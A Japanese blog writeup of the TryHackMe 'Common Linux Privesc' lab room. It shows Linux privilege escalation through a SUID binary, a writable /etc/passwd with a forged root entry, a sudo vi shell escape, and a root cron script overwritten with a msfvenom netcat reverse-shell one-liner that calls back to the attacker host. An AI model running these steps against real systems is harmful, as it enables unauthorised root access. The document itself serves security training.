TryHackMe

TryHackMe(THM): Common Linux Privesc-Writeup

TryHackMeの、多分一番かんたんな特権昇格のルーム。

昇格にいつも苦戦するので復習も兼ねてWriteupにまとめます。
ネタバレ防止の為答えはなるべく直接書かないようにしてます。

Task4 Enumeration

LinEnumを使う

有用なツールだからどっかに保管しておけと書いてあるので従ってる(けどすぐ忘れて毎回ダウンロードしてしまう)

LinEnumを使って探索する

まず書かれているIDとパスワードでssh接続

nmz@kali:~$ ssh user3@10.10.139.78
user3@polobox:~$

ローカルマシンのLinEnumのおいてあるディレクトリでWEBサーバ起動

nmz@kali:~/work/LinEnum$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

ターゲットマシンの方でwgetでLinEnumをダウンロードして実行。あとからも参照しやすいようにoutput.txtに結果を保存しておく。

user3@polobox:~$ wget 10.4.20.231:8000/LinEnum.sh
--2020-11-27 05:58:29--  http://10.4.20.231:8000/LinEnum.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh               100%[==================================>]  45.54K  56.5KB/s    in 0.8s    

2020-11-27 05:58:31 (56.5 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

user3@polobox:~$ chmod +x LinEnum.sh
user3@polobox:~$ ./LinEnum.sh |tee output.txt

LinEnumの結果を読む

ユーザーの数を確認する

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
statd:x:120:65534::/var/lib/nfs:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

利用可能なshellの確認

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

cronの確認

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5  *    * * * root    /home/user4/Desktop/autoscript.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

読めるファイル

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar  6  2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun  5  2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22  2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar  6  2020 /etc/shadow

Task5 Abusing SUID/GUID Files

SUID/GUIDファイルを使ったエクスプロイト

user3のホームディレクトリを見る
shellってのがが赤くなってて目立つ

user3@polobox:~$ ls -l
total 180
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Desktop
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Documents
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Downloads
-rwxrwxr-x 1 user3 user3 46631 Nov 27 05:46 LinEnum.sh
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Music
-rw-rw-r-- 1 user3 user3 89918 Nov 27 06:01 output.txt
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Pictures
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Public
-rwsr-xr-x 1 root  root   8392 Jun  4  2019 shell
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Templates
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Videos




shellを実行するとrootになる
Congratulations! とか言われてもなんの達成感もないけど…

Task6 Exploiting Writeable /etc/passwd

/etc/passwdのエクスプロイト
user7はrootグループのメンバーなのでuser7は/etc/passwdを編集可能らしいということがわかっている前提。

新しくユーザーを追加

opensslコマンドでパスワードハッシュを生成する

user7@polobox:/home/user3$ openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

/etc/passwodの最終行にnewユーザーを書き込む

nano /etc/passwd
...
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Ctrl+xで保存してnewユーザーとしてログイン

Task7 Escaping Vi Editor

vi使って権限昇格

user8に変更してsudoの確認

user8@polobox:/home/user7$ sudo -l
Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi

sudo viがパスワードなしで使えることがわかる

user8@polobox:/home/user7$ sudo vi

viを開いてその画面で

:!sh

と入力すると戻った画面でrootになってる。すごい。

Task8 Exploiting Crontab

cronで動いているautoscript.shを使う

msfvenomの利用

# ヘルプをみる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


# シェルをつくる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -p cmd/unix/reverse_netcat lhost=10.4.20.231 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 89 bytes
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

# msfvenomでできたスクリクトをechoでファイルにする
nmz@kali:~/THM/CommonLinuxPrivesc$ echo 'mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk' > autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ ls
autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ cat autoscript.sh 
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

作ったファイルを配置

LinEnumのときと同じような手順でターゲットマシンに転送する

user4@polobox:~/Desktop$ cp autoscript.sh bk_autoscript.sh
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    network.desktop     settings.desktop
bk_autoscript.sh  helpmanual.desktop  recyclebin.desktop  userfiles.desktop
user4@polobox:~/Desktop$ wget 10.4.20.231:8000/autoscript.sh
--2020-11-29 22:12:02--  http://10.4.20.231:8000/autoscript.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90 [text/x-sh]
Saving to: ‘autoscript.sh.1’
autoscript.sh.1     100%[===================>]      90  --.-KB/s    in 0s     
2020-11-29 22:12:03 (13.6 MB/s) - ‘autoscript.sh.1’ saved [90/90]
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    recyclebin.desktop
autoscript.sh.1   helpmanual.desktop  settings.desktop
bk_autoscript.sh  network.desktop     userfiles.desktop
user4@polobox:~/Desktop$ rm autoscript.sh
user4@polobox:~/Desktop$ cp autoscript.sh.1 autoscript.sh
user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

そしてローカル側でncを起動して5分に1回動いてくるcronを待つ

nmz@kali:~/THM/CommonLinuxPrivesc$ nc -lvp 8888
listening on [any] 8888 ...
10.10.223.125: inverse host lookup failed: Unknown host
connect to [10.4.20.231] from (UNKNOWN) [10.10.223.125] 46966
whoami
root

初回に試した時には、待てど暮らせどシェルがとれなかったのですがやり直したらうまくいきました。(原因不明)

もし失敗して困ってる人がいたら何回か試すといいのかもしれない。